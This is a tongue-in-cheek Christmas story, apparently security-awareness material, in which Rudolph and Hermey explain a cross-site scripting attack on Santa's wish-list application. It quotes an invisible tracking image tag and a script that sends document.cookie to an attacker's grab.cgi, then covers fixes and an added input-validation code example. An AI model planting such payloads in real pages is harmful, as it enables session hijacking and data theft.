
===============
Rudolph's XmaSS
===============

By Martin Burton (UK)


The big guy cheerfully loaded up his sleigh with the latest consignment of gifts, destined for all the "nice" children.  Santa thought happily of how much easier this year's task had become since the installation of the North Pole Village's new IT infrastructure.

Collecting all those paper wish lists had been an extremely tiring task.  When Bodgit and Scarper Corp. had approached him with the idea of an online system to collect Christmas wish lists, he'd jumped at the chance.  To top it all off he could also have his "naughty'n'nice"(TM) database integrated with the new system.  The database held the names of children, their addresses and a flag that indicated whether the child had been "nice" or "naughty" during the year.

By integrating the systems, Santa's elves in the operations centre could receive a child's online wish request through a browser based front-end and instantly cross-reference with the "naughty'n'nice" database to determine whether this child should receive their wish.

Bodgit and Scarper had certainly delivered the goods.  The system worked like a charm.  Productivity was up, and it even looked as though Santa would be able to take a weekend break before Christmas Eve.

Rudolph, the often ostracized reindeer, and his pal Hermey the elf had been a little worried about the lack of any IT security personnel within Santa's organisation.  Together they'd decided to set aside some time each evening to review Santa's application logs.  Santa had been quite happy with the idea, as, having attended an IT security conference designed for managers, he knew that he should have someone around to handle any IT related incidents.  Who better to entrust with this service than Rudolph, his most trusted reindeer, and Hermey, who had never quite applied himself to toy-making like the other elves.

As he heaved yet another heavy parcel onto his sleigh, Santa noticed Rudolph and Hermey heading towards him.  They looked a little agitated.  That frown on Hermey's face didn't look good, and as they got nearer he could have sworn that Rudolph's normally glowing nose seemed rather subdued.

"Santa, we've got a problem," said Hermey. "Just take a look at this."

Rudolph handed over a printout, obviously the logs that they pored over so avidly.  The duo had highlighted two of the entries in the log.

Santa reached into his pocket for his reading glasses and peered at the log.  It was the record of entries received via the online wish application.

The first highlighted entry read:

 <IMG ID="Picture" HEIGHT=0 WIDTH=0 SRC="http://www.bumblesnowmonster.com/Sample.jpg" BORDER=0>

"I don't understand this Rudolph," said Santa. "It doesn't look like all the other wishes.  In fact it doesn't look like a wish at all!"

"Exactly, but just take a look at the next one."

Santa noticed that the next highlighted entry was from the wish list of the same child.  He read:

 <script>document.location='http://www.bumblesnowmonster.com/cgi-bin/grab.cgi?'+document.cookie</script>

Santa looked up. "OK, now I'm totally bemused, would you care to tell me just what I'm seeing here?"

"Well, Santa, what you're looking at is someone trying to compromise your applications.  The attacker is using something called a Cross-Site Scripting attack," explained Rudolph.

"You see," added Hermey, "when someone enters their wishes into the online wish form, then that input gets displayed back to a browser.  If the input happens to be HTML then the browser will quite happily render it as such."

"OK, but I still don't get it."

"Right, let's take a look at that first entry," said Rudolph.  "What you are looking at is an HTML image tag, it instructs a web browser to download and display an image on the screen.  Our attacker entered an image tag to download an image from bumblesnowmonster.com into the wish form."

"OK, I understand that, but why?" asked Santa.

"Two reasons," said Hermey.  "One... to check whether the online wish application is vulnerable.  You see, when the wish is submitted, and displayed back to the attacker's browser, he can look at the page source and check whether the HTML he entered is there..."

"Why the page source?" asked Santa.  "Wouldn't he just be able to see the image?"

"No," answered Rudolph, "notice those parameters to the image tag, HEIGHT=0, WIDTH=0 and BORDER=0.  Well, those instruct the browser to display an image that is 0 pixels tall by 0 pixels wide and has no border.  Which means that to all intents and purposes the image is invisible!"

"Hmmm... now why would he want to do that?"

"Ahhh, that's where the second reason comes in," said Hermey.  "You see it's not only the culprit's web browser that will render the HTML.  Our browsers here in North Pole Village will do the same thing.  Meaning that our browsers will fire off a request to bumblesnowmonster.com to download an image, but we'll never notice it."

"And what's the point in that?"

"Logs!"

"Logs?"

"Yes," said Rudolph.  "We have to assume that our attacker has control over the webserver at bumblesnowmonster.com, and that he's reading the access logs in the same way that Hermey and I do for ours, meaning..."

"He has a method of determining from which IP address a request for this image originated," finished Hermey.  "He could use that information to launch some kind of attack against us."

"Not only that," added Rudolph. "He also knows from the HTTP request headers what browser software and operating system we are using.  He could use that information to craft an attack against any vulnerabilities in our systems."

"Yikes, that's not good!" cried Santa.

"No, it's not," agreed Rudolph, "but that's not the worst of it."

Santa groaned.

"Take another look at the second entry."

Santa looked again.

"OK, I see those angle bracket thingamybobs, so I guess we're talking HTML tags again?"

"Yes, but these tags work in a slightly different way," said Hermey. "You see, anything between those <script> and </script> tags is run as a JavaScript program on the viewer's browser."

"Now, I've heard of JavaScript," said Santa, "but I've no idea what it all does.  Tell me."

"OK.  This script is using a standard JavaScript object called 'document', which represents the current page open in the browser.  Our attacker is using two 'properties' of the document object, called 'location' and 'cookie'."

"A cookie is a small text file, stored by a browser on behalf of a web page or application, so that some information can be made persistent throughout a session," added Rudolph, "you see, the world wide web was never designed for the type of applications we use today where we might want to maintain something like login credentials or a shopping basket or such when visiting multiple pages.  Cookies were implemented to overcome the page-oriented nature of HTML and the HTTP protocol."

"I understand," said Santa, "so what's our little hooligan doing with this script?"

"What he's doing," said Hermey, "is telling the browser that it should go to another location.  That is, to load a new page.  Hang on, I'll demonstrate."

Hermey took out his wireless PDA, started his favourite text editor and typed:

 <html>
 <head></head>
 <body>
 <script>
  document.location="http://www.counterhack.net"
 </script>
 </body>
 </html>

He saved the file.

"Now, if I open up this file in my browser I get..."

"Redirected to a web site!" gasped Santa.  He peered at the screen.  "Hmmm, that book, 'Malware', for some reason I seem to have a lot of requests for it on the wish list! It must be good."

"Yes, but you get the idea?" asked Hermey.

"I do," answered Santa, "but what's this cookie thing at the end?"

"That's the really nasty bit," said Rudolph.  "You see our attacker isn't just loading a page into our browsers, he's calling a script on his own server called grab.cgi, in much the same way as our wish entry form calls a script on *our* server.  What he's passing to that script is the contents of any cookie that is set on the page where his script is rendered.  Because this is being executed on one of our elves' browsers, the details in the cookie are going to contain administrative information, not only for the wish system, but for the Naughty'n'Nice database too."

"Oh, my giddy aunt!" exclaimed Santa.  "That means that he could have access to all the data in Naughty'n'Nice.  Heck, he could even change his status."

"Yes.  Or someone else's," added Rudolph somberly.

There was a moment of silence as Santa contemplated the ramifications of this news.

"Righto boys, we've been hacked.  So what do we do now?"

"There are a number of things that need to be done," said Rudolph, who was glad he'd taken Track 4 at a recent SANS conference.  "We need to contain the attack, eradicate the problem, recover the systems to a known good state, and then sit down and make sure that this can't happen again."

"OK, I'll leave that to you, Rudolph," said Santa, "just remember that everything you do needs to be documented and adhere to North Pole policies and procedures.  I'd just like to know one thing.  How do you propose to fix the system?"

"There are two approaches to that," answered Rudolph. "Either, we could change the web application to add validation to fields that are submitted via the online form.  The validation routine would strip HTML tags out of the input, leaving only plain text.  This is by far the safest route, as a good validation routine will also protect us from SQL injection attacks, but they are another story."

"Or...," said Hermey, "we can alter the settings in our web browsers to turn off scripting and image downloading.  The only problem with this approach is that the malicious code will still be able to enter our data. It takes just one misconfigured browser to view that data and we're back at square one."

"Sounds like you guys know what you're doing," said Santa, "I'll leave you to get on with that.  How does all of this affect our e-mail wish submission service?"

"Luckily for us our e-mail doesn't interface directly with the web application," answered Rudolph, "but our mail readers are capable of displaying HTML email and running scripts.  So I'll be recommending a change to our mail reader's configuration to display only plain text and to disable scripting. That will prevent any information being leaked from our mail reader through a similar attack.  If we ever integrate the email submission system with the web application, then the validation routines that we put in can be re-used to remove malicious input before it enters the system."

"Well, I guess that clears things up for the moment," said Santa.

"Just one more thing," said Rudolph.

"Yes."

"You might just need a list of every child in California.  According to California Law SB 1386, any California consumers whose private data has been exposed in a computer attack must be notified."

Santa groaned.

As he trudged across the snow towards his office, he pulled his mobile 'phone from his pocket.

Someone at Bodgit and Scarper Corp. was going to get it in the neck...
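
The validation routine Rudolph describes, sketched as an added example (not part of the original story or of any real wish application).  It goes a step beyond stripping tags: it allow-lists characters on input and entity-encodes on output, and runs both over the two logged entries.  The function names, the allowed character set and the two ordinary wishes are assumptions.

```javascript
// Constructed wish log: entries 1 and 2 are the two highlighted in the story,
// entries 0 and 3 are made-up ordinary wishes.
const wishLog = [
  'A red bicycle with a bell',
  '<IMG ID="Picture" HEIGHT=0 WIDTH=0 SRC="http://www.bumblesnowmonster.com/Sample.jpg" BORDER=0>',
  "<script>document.location='http://www.bumblesnowmonster.com/cgi-bin/grab.cgi?'+document.cookie</script>",
  'Lego & a train set (size < 1m)',
];

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Output encoding: every HTML metacharacter becomes an entity, so whatever is
// stored is displayed by the elves' browsers as text and never parsed as markup.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Input validation by allow-list (assumed policy): letters, digits, spaces and
// a little punctuation, 1 to 200 characters. Angle brackets, quotes, '=' and
// ':' are simply not in the set, so tags cannot be entered at all.
const WISH_PATTERN = /^[\p{L}\p{N} .,!?'()&-]{1,200}$/u;

function validateWish(raw) {
  // NFKC folds look-alike forms (e.g. full-width '<') before the check.
  const wish = String(raw).normalize('NFKC').trim();
  return WISH_PATTERN.test(wish)
    ? { ok: true, wish }
    : { ok: false, reason: 'disallowed characters or length' };
}

// Log-review helper: flag entries already stored that contain tag-like text.
function looksLikeMarkup(entry) {
  return /<\s*\/?\s*[a-zA-Z!]/.test(entry);
}

// Apply all three checks to every entry, as Rudolph and Hermey's nightly review might.
function reviewLog(entries) {
  return entries.map((entry) => ({
    accepted: validateWish(entry).ok,
    suspicious: looksLikeMarkup(entry),
    rendered: escapeHtml(entry),
  }));
}

console.log(reviewLog(wishLog));
```

The last entry shows why both layers are wanted: it is not an attack, the strict allow-list still rejects it, and encoding on output is what makes such data safe to display if the policy is ever loosened.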






References:

"Javascript Guide"
http://wp.netscape.com/eng/mozilla/3.0/handbook/javascript/

"SB 1386 Senate Bill"
http://info.sen.ca.gov/pub/01-02/bill/sen/sb_1351-1400/sb_1386_bill_20020926_chaptered.html

©Copyright 2004, Ed Skoudis